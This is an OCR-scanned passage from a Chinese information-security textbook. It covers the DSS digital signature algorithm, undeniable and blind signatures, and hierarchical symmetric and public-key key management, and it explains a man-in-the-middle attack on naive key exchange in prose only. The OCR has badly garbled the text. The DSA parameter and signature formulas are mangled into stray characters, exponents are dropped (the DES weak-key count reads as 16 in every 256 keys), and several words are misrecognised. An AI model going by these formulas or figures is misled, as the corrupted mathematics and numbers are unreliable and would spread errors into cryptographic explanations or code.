选取 素数 p, 其 中 2"! 二 p 二 2+ ,512 志 L1024, 且 工 为 64 的 倍数 , 即 工 的 位 长 在 512 
和 1024 之 间 且 按 64bit 递增 。 

选取 g,(p 一 1) 的 素 因子 ,其 中 2” 之 g<<2” ,即位 长 为 160 位 。 
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选取 g,g 一 h*-?% mod 户 , 其 中 六 是 满足 1 一 pp 一 (一 1) 并 且 AD mod p1 的 任何 
整数 。 

这 三 个 公开 参数 归 一 组 用 户 所 共有 。 

(2) 产生 用 户 私 钥 z。 

选 定 以 上 的 参数 后 ,用户 选择 私 钥 。 

选择 私 钥 zx, 随机 或 伪 随 机 整数 , 且 0 二 x 二 g。 

(3) 产生 用 户 公 钥 y。 

计算 y,y= 二 g* mod p。 

(4) 与 用 户 每 条 消息 相关 的 秘密 值 。 

选择 &, 随 机 或 伪 随 机 整数 ,上 且 0 二 k=<g。 

2) 签名 过 程 

计算 签名 : * 一 户 ( 百 COM) ,zyr,g) 一 (AI( 有 COM 十 zr)) mod gq; 

r=fs(k,p,q,8)=(g* mod p) mod g。 

签名 一 (r,s) 。 

3) 验证 签名 

计算 w=f3(s',q)==(s)7! mod qi; 

ul=(H(M)Xw) mod g; 

u2= (rw) mod g; 

v=fi(y'qrg' H(M) ay) = ((g"y*) mod p) mod qi 

如 果 wv 二, 则 签名 是 有 效 的 。 

M r,s 二 接收 到 的 M、r、s。 

DSS 的 数字 签名 过 程 如 图 6-14 所 示 。 


M 


6-14 DSS 签名 方案 


其 中 ,H 是 散 列 算法 ; PKe 是 全 局 共 钥 ,包括 pg、g 三 个 参数 ; SKA 是 签名 方 的 私 钥 x; 
是 随机 数 ; Sig 是 签名 算法 ; PKs 是 签名 方 的 公 钥 ; Ver 是 验证 算法 。 

由 于 求 离散 对 数 的 困难 性 ,攻击 者 从 + 恢复 出 & 或 从 * 恢复 出 zx 都 是 不 可 行 的 。 

另 一 点 需要 注意 的 是 ,产生 签名 过 程 中 需要 进行 复杂 的 指数 运算 g* mod p, 但 由 于 它 
不 依赖 于 被 签名 的 消息 ,因此 可 以 预先 计算 。 实 际 上 ,用 户 甚至 可 以 根据 需要 预先 计算 许多 
个 用 于 签名 的 ~。 唯 一 负责 的 是 确定 乘法 逆 元 A 。 


3. 其 他 数字 签名 
另外 还 有 一 些 其 他 特殊 的 签名 : 


第 6 章 ”身份 认证 与 数字 签名 


(1) 不 可 否认 签名 : 对 于 不 可 否认 签名 ,在 得 不 到 签名 者 配合 的 情况 下 其 他 人 不 能 正 
确 地 对 签名 进行 验证 ,从 而 可 以 防止 非法 复制 和 扩散 签名 者 所 签署 的 文件 。 这 对 保护 软件 
等 电子 出 版 物 的 知识 产权 有 积极 意义 。 只 有 授权 用 户 才能 验证 签名 并 得 到 软件 开发 者 的 服 
务 , 而 非法 复制 者 不 能 验证 签名 ,从 而 无 法 获取 服务 。 

(2) 盲 签名 : 需 某 个 人 对 某 数 据 签名 ,而 又 不 能 让 他 知道 数据 的 内 容 。 在 无 记名 投票 
选举 和 数字 化 货币 系统 中 往往 需要 这 种 讶 签名 ,因此 讶 签名 在 电子 商务 和 电子 政务 系统 中 
有 着 广泛 的 应 用 前 景 。 它 和 普通 签名 相 比 有 两 个 特点 ,一 个 是 签名 者 不 知道 所 签署 的 数据 
内 容 , 另 一 个 是 在 签名 被 接收 者 泄露 后 ,签名 者 不 能 追踪 签名 。 
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根据 近代 密码 学 观点 , 密 钥 体 制 的 安全 应 当 只 取决 于 密 钥 的 安全 ,而 不 取决 于 对 密码 算 
法 的 保密 。 因 此 密 钥 管理 是 至 关 重 要 的 。 

密 钥 管理 历来 就 是 一 个 很 复杂 的 问题 ,在 计算 机 网 络 环境 中 ,由 于 用 户 和 结 点 很 多 , 因 
此 需要 使 用 大 量 的 密 钥 ,而 且 需 要 经 常 更 换 , 其 产生 、 存 储 、 分 配 都 是 极 大 的 问题 , 既 包 含 一 
系列 的 技术 问题 ,又 包含 许多 管理 问题 和 人 员 素 质问 题 , 需 要 一 套 妥善 的 管理 方法 。 每 一 个 
环节 都 必须 谨慎 ,否则 会 带 来 意 想不到 的 损失 。 历 史 表 明 , 从 密 钥 管理 的 途径 穷 取 秘密 比 单 
纯 的 破译 所 花 的 代价 要 小 得 多 。 

假如 分 析 人 员 能 从 粗心 的 密 钥 管理 程序 中 很 容易 找到 密 钥 ,他 何必 为 破译 而 操心 烦恼 
呢 ? 如 果 花 一 千 元 能 贿赂 一 个 密 钥 管理 人 员 ,何必 花 一 千 万 去 制造 一 台 破 译 机 器 呢 ? 另外 
还 可 以 偷 到 密 钥 ,也 可 以 绑架 知道 密 钥 的 人 。 总 之 ,在 人 身上 找到 漏洞 比 在 密码 体制 中 找到 
漏洞 更 容易 。 

所 以 ,人 们 必须 像 保 护 他 们 的 数据 那样 保护 他 们 的 密 钥 。 如 果 一 个 密 钥 不 经 常 更 改 , 那 
么 分 析 者 有 可 能 在 很 小 的 代价 下 获得 大 量 的 有 价值 的 数据 。 

从 技术 上 讲 , 密 钥 管理 包括 了 密 钥 的 产生 存储 分配、 组 织 、 使 用 ,更 换 和 销毁 等 一 系列 
技术 问题 。 每 个 密 钥 都 有 其 生命 周期 , 密 钥 管理 就 是 对 整个 生命 周期 的 各 个 阶段 进行 管理 。 
密 钥 体制 不 同 ,其 管理 方法 也 不 同 。 

密 钥 管 理 是 数据 加 密 技术 中 的 重要 一 环 ,其 目的 是 确保 密 钥 的 安全 性 (真实 性 和 有 效 
性 )。 一 个 好 的 密 钥 管理 系统 应 该 做 到 ， 

(1) 密 钥 难以 被 窃取 。 

(2) 在 一 定 条 件 下 窃取 了 密 钥 也 没有 用 , 密 钥 有 使 用 范围 和 时 间 的 限制 。 

(3) 密 钥 的 分 配 和 更 换 过 程 对 用 户 透 明 , 用 户 不 一 定 要 亲自 掌管 密 钥 。 

另外 需要 说 明 的 是 ,对 称 密码 体制 的 密 钥 管理 和 非 对 称 密码 体制 的 密 钥 管理 是 完全 不 
同 的 。 


71 对 称 密码 体制 的 密 钥 管理 


对 称 密码 体制 的 加 密 钥 等 于 解密 钥 ,因此 密 钥 的 秘密 性 、 真 实 性 和 完整 性 必须 同时 保 
护 。 这 就 带 来 了 密 钥 管理 方面 的 复杂 性 。 对 于 大 型 网 络 系 统 ,由 于 所 需要 的 密 钥 种 类 和 数 


量 都 很 多 ,因此 密 钥 管理 尤其 困难 。 著 名 的 DES 的 颁布 和 广泛 应 用 ,促使 人 们 对 传统 密码 
管理 理论 和 技术 进行 研究 ,于 是 ANSI 颁布 了 ANSI X9. 17 金融 机 构 密 钥 管 理 标准 ,为 
DES、AES 等 商业 密码 的 应 用 提供 了 密 钥 管理 指导 。 


711 密 钥 分 级 


密 钥 分 为 初级 密 钥 、 二 级 密 钥 和 主 密 钥 。ANSI X9. 17 支持 这 种 三 级 密 钥 组 织 。 
1. 初级 密 钥 


初级 密 钥 是 真正 用 于 加 解密 数据 的 密 钥 ,根据 其 使 用 范围 不 同 其 称呼 有 所 差别 。 例 如 
用 于 通信 保密 的 初级 密 钥 为 初级 通信 密 钥 ,用 于 文件 保密 的 称 为 初级 文件 密 钥 , 用 于 通信 会 
话 保 密 的 称 为 初级 会 话 密 钥 。 

初级 密 钥 可 由 系统 应 实体 请 求 通过 硬件 或 者 软件 的 方式 产生 ,也 可 以 由 用 户 自己 提供 。 
初级 通信 和 密 钥 和 初级 会 话 密 钥 原 则 上 采用 一 个 密 钥 只 使 用 一 次 的 “一 次 一 密 ” 方 式 。 也 就 是 
说 ,初级 通信 密 钥 和 初级 会 话 密 钥 仅 在 两 个 应 用 实体 之 间 交 换 数据 的 时 候 才 存在 ,生存 周期 
很 短 。 初 级 文件 密 钥 与 其 所 保护 的 文件 有 一 样 长 的 生存 周期 。 

初级 密 钥 在 系统 中 不 能 以 明文 形式 保存 ,必须 用 更 高 级 的 密 钥 进行 加 密 保存 。 

2. 二 级 密 钥 

二 级 密 钥 用 于 保护 初级 密 钥 。 当 二 级 密 钥 用 于 保护 初级 通信 密 钥 时 称 为 二 级 通信 和 密 
钥 , 用 于 保护 初级 文件 密 钥 时 称 为 二 级 文件 密 钥 。 

二 级 密 钥 可 由 系统 应 专职 密 钥 安装 人 员 的 请 求 , 由 系统 自己 产生 ,也 可 由 专职 密 钥 安 装 
人 员 提 供 。 二 级 密 钥 的 生存 周期 一 般 较 长 。 同 样 ,二 级 密 钥 也 不 能 以 明文 形式 保存 在 系统 
中 ,必须 接受 更 高 级 密 钥 的 保护 。 


3. 主 密 钥 


主 密 钥 是 密 钥 管理 方案 中 的 最 高 级 密 钥 , 用 于 对 二 级 密 钥 进行 保护 。 
主 密 钥 由 密 钥 专职 人 员 随 机 产生 ,并 妥善 安装 。 主 密 钥 的 生存 周期 很 长 。 


7.12 密 钥 生成 


算法 的 安全 性 依赖 于 密 钥 ,如 果 采 用 一 个 弱 的 密 钥 生成 方法 ,那么 整个 体制 是 弱 的 。 因 
为 能 破译 密 钥 生成 算法 ,所 以 攻击 者 就 不 需要 试图 去 破译 的 加 密 算法 了 。 

好 密 钥 是 指 那些 由 自动 处 理 设备 生成 的 随机 的 比特 串 。 如 果 密 钥 为 64 比特 长 ,产生 每 
一 个 可 能 的 64 比特 密 钥 必须 具有 相同 的 可 能 性 。 这 些 密 钥 比 特 串 要 么 从 可 靠 的 随机 源 中 
产生 (例如 抛 硬币 或 者 噪音 发 生 器 ) ,要 么 从 安全 的 伪 随 机 比特 发 生 器 中 产生 。 同 时 要 有 好 
的 加 密 算法 和 密 钥 管理 程序 。 

许多 加 密 算法 有 弱 的 密 钥 。 例 如 DES 在 每 256 个 密 钥 中 会 有 16 个 弱 密 钥 。 

对 公 钥 密码 体制 来 说 ,生成 密 钥 更 加 困难 ,因为 密 钥 必须 满足 某 些 数学 特征 (必须 是 素 
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数 的 ,是 二 次 剩余 的 等 ) ,而 且 从 密 钥 管理 的 观点 看 , 密 钥 发 生 器 的 随机 种 子 也 必须 是 随 
机 的 。 

对 密 钥 的 一 个 基本 要 求 就 是 具有 良好 的 随机 性 ,这 主要 包括 长 周期 性 、 非 线性 ` 统 计 意 
义 上 的 等 概率 性 以 及 不 可 预测 性 等 。 一 个 真正 的 随机 序列 是 不 可 再 现 的 ,任何 人 都 不 能 再 
次 产生 它 。 高 效 地 产生 高 质量 的 真 随机 序列 不 是 一 件 容易 的 事情 。 因 此 ,对 我 们 有 实际 意 
义 的 是 针对 不 同 的 情况 采用 不 同 的 随机 序列 。 例 如 ,对 于 主 密 钥 , 则 应 当 采 用 高 质量 的 真 随 
机 序列 。 而 对 于 初级 密 钥 ,并 不 需要 一 定 采 用 真 随机 序列 ,采用 足够 随机 的 伪 随 机 序列 就 可 
以 了 。 


1. 主 密 钥 的 产生 


主 密 钥 是 密码 系统 中 的 最 高 级 密 钥 , 用 它 对 其 他 密 钥 进行 保护 ,而 且 生 存 周期 长 ,因此 
它 的 产生 要 格外 小 心 。 

主 密 钥 应 当 是 高 质量 的 真 随机 序列 。 真 随机 数 应 该 从 自然 界 的 随机 现象 中 提取 产生 ， 
一 般 原理 是 将 自然 界 的 随机 模拟 信号 经 适当 处 理 , 再 数字 化 后 得 到 。 理 论 上 随机 源 的 选择 
具有 一 定 的 自由 度 , 可 以 根据 不 同 的 应 用 选择 不 同 的 随机 源 。 但 适合 用 做 密 钥 的 并 不 多 ,有 
些 自 然 随 机 现象 产生 的 随机 序列 并 不 高 。 因 此 ,有 时 候 采用 真 随机 和 伪 随 机 相 结合 的 方法 
来 产生 高 质量 的 随机 数 作为 主 密 钥 。 

真 随机 数 的 产生 常 采用 物理 噪声 源 的 方法 。 主 要 有 基于 力学 的 噪声 源 和 基于 电子 学 的 
噪声 源 。 基 于 力学 的 噪声 源 常 利用 硬币 和 骨 子 抛 撤 落 地 的 随机 性 产生 密 钥 ,但 效率 低 , 已 经 
很 少 使 用 。 基 于 电子 学 噪声 源 的 密 钥 产 生 技 术 是 目前 最 主要 的 密 钥 产生 技术 。 例 如 利用 电 
子 方法 对 噪声 器 件 (如 MOS 晶体 管 稳 压 二 极 管 、 电 阻 等 ) 的 热 噪声 进行 放大 、 滤 波 、 采 样 、 
量化 后 产生 出 随机 密 钥 ,并 制 成 随机 数 产 生 器 芯片 。 


2. 二 级 密 钥 的 产生 


可 以 像 产生 主 密 钥 那样 产生 真正 随机 的 二 级 密 钥 。 特 别 是 利用 真 随机 数 产生 器 芯片 来 
产生 二 级 密 钥 也 是 比较 方便 的 。 

另外 使 用 主 密 钥 和 一 个 强 的 密码 算法 来 产生 二 级 密 钥 也 是 可 以 的 。 一 个 强 的 密码 算法 
可 以 用 做 一 个 具有 良好 随机 性 的 随机 数 产生 器 。 


3. 初级 密 钥 的 产生 

为 了 安全 和 简便 ,通常 把 随机 数 视 为 受 高 级 密 钥 ( 主 密 钥 或 者 二 级 密 钥 ) 加 密 后 的 初级 
密 钥 。 因 此 ,随机 数 被 解密 后 得 到 初级 密 钥 。 
7.13 密 钥 的 存储 与 备份 


密 钥 的 安全 存储 是 密 钥 管理 中 的 一 个 十 分 重要 的 环节 ,而 且 也 是 比较 困难 的 一 个 环节 。 
所 谓 密 钥 的 安全 存储 就 是 要 确保 密 钥 在 存储 状态 下 的 秘密 性 真实 性 和 完整 性 。 安 全 可 靠 
的 存储 介质 是 密 钥 安全 存储 的 物质 条 件 ,安全 严密 的 访问 控制 机 制 是 密 钥 安 全 存储 的 管理 
条 件 。 只 有 当 这 两 个 条 件 同时 具备 时 ,才能 确保 密 钥 的 安全 存储 。 


密 钥 安全 存储 的 原则 是 不 允许 密 钥 以 明文 形式 出 现在 密 钥 管理 设备 之 外 。 

为 了 进一步 确保 密 钥 和 加 密 数据 的 安全 ,对 密 钥 进行 备份 是 必要 的 。 目 的 是 一 旦 密 钥 
遭 到 毁坏 ,可 利用 备份 的 密 钥 恢复 出 原来 的 密 钥 或 被 加 密 的 数据 ,避免 造成 损失 。 密 钥 备 份 
本 质 上 也 是 一 种 存储 。 

密 钥 的 存储 形态 有 明文 形态 、 密 文 形态 .分 量 形态 三 种 。 

明文 形态 即 密 钥 以 明文 形式 存储 。 

密 文 形态 即 密 钥 被 加 密 后 存储 。 

分 量 形态 是 指 密 钥 以 分 量 的 形式 存储 , 密 钥 分 量 不 是 密 钥 本 身 , 而 是 用 于 产生 密 钥 的 部 
分 参数 ,只 有 在 所 有 密 钥 分 量 共同 作用 下 才能 产生 出 真正 的 密 钥 ,而 且 只 知道 其 中 一 个 或 部 
分 分 量 ,无 法 求 出 其 他 分 量 。 


1. 密 钥 存储 


不 同 级 别 的 密 钥 应 采用 不 同 的 存储 形态 , 密 钥 的 不 同形 态 应 当 采 用 不 同 的 存储 方式 。 

1) 主 密 钥 的 存储 

主 密 钥 是 最 高 级 别 的 密 钥 ,主要 用 于 对 二 级 密 钥 和 初级 密 钥 进行 保护 。 主 密 钥 的 安全 
性 要 求 最 高 ,而且 生 存 周期 很 长 ,需要 采用 最 安全 的 方法 存储 。 

由 于 它 是 最 高 级 别 , 所 以 只 能 用 明文 形式 存储 ,否则 就 不 能 工作 。 这 就 要 求 存储 器 必须 
是 高 度 安全 的 ,不 但 物理 上 安全 ,而 且 逻 辑 上 安全 。 通 常 是 将 其 存储 在 专用 密码 装置 中 。 

2) 二 级 密 钥 的 存储 

二 级 密 钥 可 以 以 明文 形式 存储 也 可 以 用 密 文 形 式 存储 。 如 果 以 明文 形式 存储 , 则 和 主 
密 钥 一 样 ,必须 存放 在 专用 密 钥 装置 中 。 如 果 以 密 文 形式 存储 , 则 对 存储 器 要 求 降低 。 通 常 
采用 以 高 级 密 钥 加 密 的 形式 存储 二 级 密 钥 。 这 样 可 以 减少 明文 形态 密 钥 的 数量 ,便于 管理 。 

3) 初级 密 钥 的 存储 

初级 文件 密 钥 和 初级 会 话 密 钥 是 两 种 不 同性 质 的 初级 密 钥 ,因此 存储 方法 也 有 所 不 同 。 

由 于 初级 文件 密 钥 的 生命 周期 与 受 保护 的 文件 的 生命 周期 一 样 长 ,有 时 会 很 长 ,所 以 初 
级 文件 密 钥 需要 妥善 地 存储 。 初 级 文件 密 钥 一 般 采 用 密 文 形式 存储 ,通常 采用 以 二 级 文件 
密 钥 加 密 的 形式 存储 初级 文件 密 钥 。 

由 于 初级 会 话 密 钥 按 “ 一 次 一 密 ” 的 方式 工作 ,使 用 时 动态 产生 ,使 用 完毕 后 立即 销毁 ， 
生命 周期 很 短 。 因 此 初级 会 话 密 钥 的 存储 空间 是 工作 存储 器 ,应 当 确保 工作 存储 器 的 安全 。 


2. 密 钥 备份 


密 钥 的 备份 是 确保 密 钥 和 数据 安全 一 种 有 备 无 患 的 方式 。 备 份 的 方式 有 多 种 ,除了 用 
户 自己 备份 以 外 ,也 可 以 交 由 第 三 方 进行 备份 ,还 可 以 以 密 钥 分 量 形态 委托 密 钥 托管 机 构 备 
份 。 有 了 备份 ,在 需要 时 可 以 恢复 密 钥 ,从 而 避免 损失 。 

不 管 以 什么 方式 进行 备份 , 密 钥 的 备份 应 该 遵循 以 下 原则 : 

(1) 密 钥 的 备份 应 当 是 异 设备 备份 ,甚至 是 异地 备份 。 如 果 是 同 设备 , 当 密 钥 存储 设备 
出 现 故障 时 ,备份 的 密 钥 也 将 毁坏 ,因此 不 能 起 到 备份 的 作用 。 异 地 备份 可 以 避免 因 场地 被 
攻击 而 使 密 钥 和 备份 密 钥 同时 被 损 。 

(2) 备份 的 密 钥 应 当 受到 与 存储 密 钥 一 样 的 保护 ,包括 物理 的 安全 保护 和 逻辑 的 安全 
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保护 。 
(3) 为 了 减少 明文 形态 的 密 钥 数量 ,一 般 采 用 高 级 密 钥 保护 低级 密 钥 的 方式 来 进行 备份 。 
(4) 对 于 高 级 密 钥 ,不 能 以 密 文 形态 备份 。 为 了 进一步 增强 安全 ,可 采用 多 个 密 钥 分 量 
的 形态 进行 备份 。 每 一 个 密 钥 分 量 应 分 别 备份 到 不 同 的 设备 或 不 同 的 地 点 ,并 且 分 别 指定 
专人 负责 。 
(5) 密 钥 的 备份 应 当 方 便 恢复 , 密 钥 的 恢复 应 当 经 过 授权 而 且 要 遵循 安全 的 规章 制度 。 
(6) 密 钥 的 备份 和 恢复 都 要 记录 日 志 , 并 进行 审计 。 


714 密 钥 分 配 


密 钥 的 分 配 是 指 产 生 密 钥 并 将 密 钥 传送 给 使 用 者 的 过 程 。 密 钥 的 传送 分 集中 传送 和 分 
散 传送 两 类 。 集 中 传送 是 指 将 密 钥 整体 传送 ,这 时 需要 使 用 主 密 钥 来 保护 会 话 密 钥 的 传递 ， 
并 通过 安全 渠道 传递 主 密 钥 。 分 散 传送 是 指 将 密 钥 分 解 成 多 个 部 分 ,用 秘密 分 享 的 方法 传 
递 ,只 要 有 部 分 到 达 就 可 以 恢复 ,这 种 方法 适用 于 在 不 安全 的 信道 中 传输 。 


1. 主 密 钥 的 分 配 


主 密 钥 的 安全 性 要 求 最 高 ,而 生存 周期 很 长 ,需要 采取 最 安全 的 分 配方 法 。 一 般 采 用 人 
工分 配 主 密 钥 ,由 专职 密 钥 分 配 人 员 分 配 并 由 专职 安装 人 员 妥 善 安装 。 


2. 二 级 密 钥 的 分 配 


在 主 密 钥 分 配 并 安装 后 ,二 级 密 钥 的 分 配 就 容易 解决 了 。 

一 种 方法 是 像 分 配 主 密 钥 那 样 ,由 专职 密 钥 分 配 人 员 分 配 并 由 专职 安装 人 员 安 装 。 虽 
然 这 种 人 工分 配 的 方法 很 安全 ,但 效率 低 ,不 适应 计算 机 网 络 环境 的 需求 。 

男 一 种 方法 是 直接 利用 已 经 分 配 安 装 的 主 密 钥 对 二 级 密 钥 进行 加 密 保护 ,并 利用 计算 
机 网 络 自动 传输 分 配 。 在 发 送 端 用 主 密 钥 对 二 级 密 钥 进行 加 密 , 把 密 文 传送 给 对 方 , 对 方 用 
主 密 钥 解密 得 到 二 级 密 钥 ,并 妥善 安装 存储 ,如 图 7-1 所 示 。 其 中 ,Kxc 是 要 分 配 的 二 级 密 
钥 ,Kw 是 已 分 配 并 安装 的 主 密 钥 。 
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图 7-1 二 级 密 钥 的 分 配 


3. 初级 密 钥 的 分 配 


由 于 初级 密 钥 按 “ 一 次 一 密 ” 的 方法 工作 ,生命 周期 很 短 ,而 对 其 产生 和 分 配 的 速度 却 要 
求 很 高 。 为 了 安全 和 方便 ,通常 总 是 把 一 个 随机 数 直接 视 为 一 个 初级 密 钥 被 高 级 密 钥 ( 主 密 
钥 或 者 二 级 密 钥 ,通常 为 二 级 密 钥 ) 加 密 之 后 的 结果 ,这 样 初 级 密 钥 一 产生 就 是 密 文 形式 。 
注意 ,这 个 随机 数 要 在 被 解密 之 后 才 是 真正 的 初级 密 钥 。 

因此 初级 密 钥 的 分 配 就 变 得 很 简单 ,发 送 方 直接 把 随机 数 ( 密 文 形式 的 初级 密 钥 ) 通 过 


计算 机 网 络 传 给 对 方 ,接收 端 用 高 级 密 钥 解密 获取 初级 密 钥 ,分 配 过 程 如 图 7-2 所 示 。 其 
中 ,RN 是 随机 数 ,Kxc 是 二 级 密 钥 ,Kc 是 初级 密 钥 。 
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7-2 初级 密 钥 的 分 配 


而 实际 在 传送 过 程 中 ,还 要 考虑 到 传送 内 容 可 能 会 被 截获 .伪造 , 自 改 ,所 以 要 构建 恰当 
的 协议 来 防止 这 些 攻 击 。 


4. 利用 公 钥 密码 体制 分 配 


利用 公 钥 密码 体制 分 配对 称 密码 的 会 话 密 钥 ,再 利用 对 称 密码 的 会 话 密 钥 对 会 话 进 行 
加 密 保护 ,将 公 钥 密码 的 方便 性 和 传统 密码 的 快速 性 结合 ,是 一 种 较 好 的 密 钥 分 配方 法 。 这 
种 方法 已 得 到 国际 标准 化 组 织 的 采纳 ,并 且 在 许多 国家 得 到 使 用 。 

当 A 要 和 B 通 信和 时 ,A 产生 一 对 公 钥 - 私 钥 对 ,并 向 B 发 送 产 生 的 公 钥 和 A 的 身份 。B 
收 到 A 的 消息 后 ,产生 会 话 密 钥 Ks, 用 产生 的 公 钥 加 密 后 发 送 给 A。A 用 私 钥 解 密 得 到 会 
话 密 钥 Ks。 此 时 ,A 和 B 可 以 用 会 话 密 钥 Ks 采用 对 称 密码 通信 。 之 后 A 销毁 此 次 产生 的 
公 钥 - 私 钥 对 ,B 销毁 从 A 得 到 的 公 钥 。 

这 个 过 程 如 图 7-3 所 示 。 

(1) A 向 B 发 送 自己 产生 的 公 钥 和 A 的 身份 。 

(2) B 收 到 消息 后 ,产生 会 话 密 钥 Ks, 用 公 钥 加 密 后 传送 给 A。 

(3) A 用 私 钥 解密 后 得 到 Ks。 

这 个 方法 虽然 简单 ,但 是 容易 受到 敌手 的 攻击 ,比如 有 人 可 以 冒充 A 产生 密 钥 ; 也 有 人 
可 能 冒充 B 产生 密 钥 ; 也 有 可 能 消息 在 发 送 过 程 中 受到 算 改 。 

例如 , 当 A 向 BB 发 送 自 己 产 生 的 公 钥 和 A 的 身份 时 ,攻击 者 C 在 中 途 截获 了 这 些 信 
息 ,C 对 信息 进行 自 改 ,把 C 的 公 钥 和 A 的 身份 发 送 给 B。 当 B 产生 会 话 密 钥 Ks, 用 公 钥 
(实际 上 是 C 的 公 钥 ) 加 密 后 传送 给 A 时 ,C 在 中 途 截获 这 些 信息 ,并 用 自己 的 私 钥 解 密 后 
获取 会 话 密 钥 Ks, 然 后 用 A 的 公 钥 加 密 Ks 发 送 给 A。 这 样 C 就 成 功 获取 了 A 和 也 的 会 
话 密 钥 ,可 以 破解 他 们 之 间 的 通信 了 。 

所 以 ,对 这 种 密 钥 分 配方 案 做 进一步 优化 ,可 得 到 如 下 具有 保密 性 和 认证 的 分 配方 法 
(如 图 7-4 所 示 )。 
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假定 A 和 了 B 的 公 钥 已 经 共享 : 

(1) A 用 B 的 公 钥 加 密 A 的 身份 和 一 个 一 次 性 随机 数 Ni 后 发 送 给 B。 

(2) B 解 密 得 到 Ni ,并 用 A 的 公 钥 加 密 N 和 另外 一 个 随机 数 N, 发 送 给 A。 

(3) A 用 B 的 公 钥 加 密 N, 后 发 送 给 B。 

(4) A 选择 一 个 会 话 密 钥 Ks, 用 A 的 私 钥 加 密 后 再 用 B 的 公 钥 加 密 ,发 送 给 B,B 用 A 
的 公 钥 和 B 的 私 钥 解密 得 Ks。 

在 这 个 方法 中 ,需要 假定 A 和 B 的 公 钥 已 经 共享 ,而 如 何 实现 公 钥 的 共享 其 实 也 是 一 
个 复杂 的 问题 ,将 在 下 一 小 节 公 钥 密 码 体制 的 密 钥 分 配 中 详细 讲述 。 


7.15 密 钥 的 更 新 


密 钥 的 更 新 是 密 钥 管理 中 非常 麻烦 的 一 个 环节 ,必须 周密 计划 ,谨慎 实施 。 当 密 钥 的 使 
用 期 限 已 到 ,或 怀疑 密 钥 泄露 时 , 密 钥 必 须 更 新 。 密 钥 更 新 是 密码 技术 的 一 个 基本 原则 。 密 
钥 更 新 越 频繁 就 越 安 全 ,但 同时 也 越 麻烦 。 


1. 主 密 钥 的 更 新 


主 密 钥 是 最 高 级 密 钥 , 它 保 护 二 级 密 钥 和 初级 密 钥 。 主 密 钥 的 生命 周期 最 长 ,因此 由 于 
使 用 期 限 到 期 而 更 换 主 密 钥 的 时 间 间 隔 很 长 。 更 新 时 必须 重新 安装 ,安全 要 求 与 初次 安装 
一 样 。 值 得 注意 的 是 , 主 密 钥 的 更 新 将 要 求 受 其 保护 的 二 级 密 钥 和 初级 密 钥 都 要 更 新 。 
此 主 密 钥 的 更 新 是 很 麻烦 的 。 


2. 二 级 密 钥 的 更 新 


当 二 级 密 钥 使 用 期 限 到 期 或 者 因为 泄露 需要 更 换 时 ,要 重新 产生 二 级 密 钥 ,并 且 妥 善 安 
装 。 同 样 也 要 求 受 其 保护 的 初级 密 钥 更 新 。 


3. 初级 密 钥 的 更 新 


初级 会 话 密 钥 采 用 “一 次 一 密 ” 的 方式 工作 ,所 以 更 新 是 非常 容易 的 。 
初级 文件 密 钥 更 新 要 麻烦 得 多 ,将 原来 的 密 文 文件 解密 并 且 用 新 的 初级 文件 密 钥 重新 
加 密 。 


7.16 密 钥 的 终止 和 销毁 


密 钥 的 终止 和 销毁 同样 是 密 钥 管理 中 的 重要 环节 ,但 容易 被 忽视 。 

当 密 钥 使 用 期 限 到 期 时 ,应 该 立即 终止 使 用 该 密 钥 ,并 且 更 换 新 密 钥 。 终 止 使 用 的 密 钥 
并 不 马上 销毁 ,而 需要 保留 一 段 时 间 。 这 是 为 了 确保 受 其 保护 的 其 他 密 钥 和 数据 得 以 妥善 
处 理 。 只 要 密 钥 尚未 销毁 ,就 应 该 妥善 保护 。 

密 钥 销毁 要 彻底 清除 密 钥 的 一 切 存储 形态 和 相关 信息 ,使 重复 这 一 密 钥 变 得 不 可 能 。 
这 里 既 包 括 处 于 产生 、 分 配 、 存 储 和 工作 状态 的 密 钥 及 相关 信息 ,也 包括 处 于 备份 状态 的 密 
钥 和 相关 信息 。 


值得 注意 的 是 ,要 采用 妥善 的 清除 存储 器 的 方法 ,对 于 磁 存 储 器 ,简单 的 删除 、 清 零 或 写 
1 都 是 不 安全 的 。 


72 公 钥 密码 体制 的 密 钥 管理 


由 于 公 钥 密码 体制 与 对 称 密码 体制 是 性 质 不 同 的 两 种 密码 体制 ,所 以 它们 的 密 钥 产生 
和 管理 也 完全 不 同 。 

对 称 密 码 体制 的 密 钥 本 质 上 是 一 种 随机 数 或 者 随机 序列 ,而 公 钥 密 码 体制 本 质 上 是 一 
种 单 向 陷 门 函数 ,建立 在 某 一 数学 难题 之 上 。 不 同 公 钥 密码 体制 所 依据 的 数学 难题 不 同 , 因 
此 其 密 钥 产生 的 具体 要 求 也 不 同 。 

所 以 , 公 钥 密码 体制 的 密 钥 管理 和 对 称 密码 体制 的 密 钥 管理 有 着 本 质 的 区 别 。 


72.1 公 钥 的 分 配 


前 面 讲述 的 对 称 密 钥 密码 体制 中 加 密 解密 只 有 一 个 密 钥 ,因此 在 密 钥 分 配 中 必须 保证 
其 保密 性 ,真实 性 和 完整 性 。 而 公 钥 密码 体制 有 两 个 密 钥 ,在 分 配 的 时 候 要 确保 私 钥 的 秘密 
性 、 真 实 性 和 完整 性 ,对 于 公 钥 , 则 保证 其 真实 性 和 完整 性 , 绝 不 允许 攻击 者 替换 或 者 算 改 用 
户 的 公 钥 。 

公 钥 的 分 配方 式 从 简单 到 复杂 有 这 样 几 种 : 

(1) 公开 发 布 : 用 户 将 自己 的 公 钥 发 给 所 有 其 他 用 户 或 向 某 一 团体 广播 。 例 如 将 自己 
的 公 钥 发 布 在 BBS 或 者 邮件 列表 上 。 这 种 方法 方便 快捷 ,每 个 人 都 可 以 很 方便 地 发 布 自己 
的 公 钥 。 但 缺点 也 很 明显 ,容易 被 人 冒充 或 者 复 改 。 所 以 这 种 方法 一 般 为 简单 的 个 人 应 用 ， 
或 者 在 一 些小 型 网 络 中 使 用 。 

(2) 公 钥 动态 目录 表 : 建立 一 个 公用 的 公 钥 动态 目录 表 , 表 的 建立 和 维护 以 及 公 钥 的 
分 布 由 某 个 公 钥 管理 机 构 承担 ,每 个 用 户 都 可 靠 的 知道 管理 机 构 的 公 钥 。 但 在 这 个 方法 中 ， 
每 一 用 户 想 要 与 他 人 通信 都 要 求助 于 公 钥 管理 机 构 ,因而 可 能 形成 瓶颈 ,而 且 公 钥 目 录 表 也 
容易 被 臭 改 。 所 以 这 个 方法 只 适合 用 于 小 型 网 络 ,例如 企业 局 域 网 中 。 

(3) 数字 证 书 : 分 配 公 钥 的 最 安全 有 效 的 方法 是 采用 数字 证 书 , 它 由 证 书 管理 机 构 CA 
为 用 户 建立 ,实际 上 是 一 个 数据 结构 。 其 中 的 数据 项 有 该 用 户 的 公 钥 ,用户 的 身份 和 时 间 惟 
